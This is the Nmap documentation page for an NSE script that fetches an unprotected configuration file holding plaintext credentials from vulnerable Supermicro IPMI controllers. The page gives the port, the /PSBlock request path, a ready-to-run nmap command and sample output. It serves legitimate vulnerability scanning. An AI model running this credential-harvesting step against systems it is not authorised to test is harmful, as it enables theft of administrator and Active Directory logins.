Script supermicro-ipmi-conf

Script types: portrule
Categories: exploit, vuln
Download: https://svn.nmap.org/nmap/scripts/supermicro-ipmi-conf.nse

Script Summary

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains users with their passwords in plain text.

References:

• http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
• https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi

Script Arguments

supermicro-ipmi-conf.out

Output file to store configuration file. Default: <ip>_bmc.conf

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p49152 --script supermicro-ipmi-conf <target>

Script Output

PORT      STATE SERVICE REASON
49152/tcp open  unknown syn-ack
| supermicro-ipmi-conf:
|   VULNERABLE:
|   Supermicro IPMI/BMC configuration file disclosure
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some Supermicro IPMI/BMC controllers allow attackers to download
|        a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the
|       network's Active Directory.
|     Disclosure date: 2014-06-19
|     Extra information:
|       Snippet from configuration file:
|   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|
|     References:
|_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/

Requires

• http
• io
• shortport
• string
• vulns
• stdnse

---

Author:

• Paulino Calderon <calderon () websec mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html